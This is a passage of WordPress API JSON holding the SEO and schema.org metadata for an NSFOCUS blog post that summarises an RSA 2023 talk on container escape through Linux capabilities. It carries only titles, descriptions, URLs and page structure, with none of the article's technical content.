Security\"],\"articleSection\":[\"Blog\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\",\"name\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"datePublished\":\"2023-06-23T15:30:00+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"description\":\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. 
This article will provide a detailed introduction to the technical principles of this topic.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"width\":764,\"height\":457,\"caption\":\"Stacked colorful shipping containers at port.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/nsfocusglobal.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"name\":\"NSFOCUS\",\"description\":\"Security Made Smart and 
Simple\",\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\",\"name\":\"NSFOCUS\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"width\":248,\"height\":36,\"caption\":\"NSFOCUS\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/nsfocusglobal.com\"],\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","robots":{"index":"noindex","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"pt_BR","og_type":"article","og_title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","og_description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. 
This article will provide a detailed introduction to the technical principles of this topic.","og_url":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","og_site_name":"NSFOCUS","article_published_time":"2023-06-23T15:30:00+00:00","article_modified_time":"2026-04-17T18:07:40+00:00","og_image":[{"url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","twitter_description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","twitter_image":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","twitter_misc":{"Escrito por":"admin","Est. 
tempo de leitura":"9 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#article","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"},"author":{"name":"admin","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d"},"headline":"An Insight into RSA 2023: Capabilities Utilization for Container Escape","datePublished":"2023-06-23T15:30:00+00:00","dateModified":"2026-04-17T18:07:40+00:00","mainEntityOfPage":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"},"wordCount":1298,"commentCount":0,"publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"image":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","keywords":["Container Security"],"articleSection":["Blog"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","url":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","name":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - 
NSFOCUS","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"image":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","datePublished":"2023-06-23T15:30:00+00:00","dateModified":"2026-04-17T18:07:40+00:00","description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","breadcrumb":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","width":764,"height":457,"caption":"Stacked colorful shipping containers at 
port."},{"@type":"BreadcrumbList","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nsfocusglobal.com\/"},{"@type":"ListItem","position":2,"name":"An Insight into RSA 2023: Capabilities Utilization for Container Escape"}]},{"@type":"WebSite","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website","url":"https:\/\/nsfocusglobal.com\/pt-br\/","name":"NSFOCUS","description":"Security Made Smart and Simple","publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nsfocusglobal.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization","name":"NSFOCUS","url":"https:\/\/nsfocusglobal.com\/pt-br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","width":248,"height":36,"caption":"NSFOCUS"},"image":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d1528726147
6b9384e690ed0c568de?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/nsfocusglobal.com"],"url":"https:\/\/nsfocusglobal.com\/pt-br\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/24865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/comments?post=24865"}],"version-history":[{"count":0,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/24865\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media\/24900"}],"wp:attachment":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media?parent=24865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/categories?post=24865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/tags?post=24865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}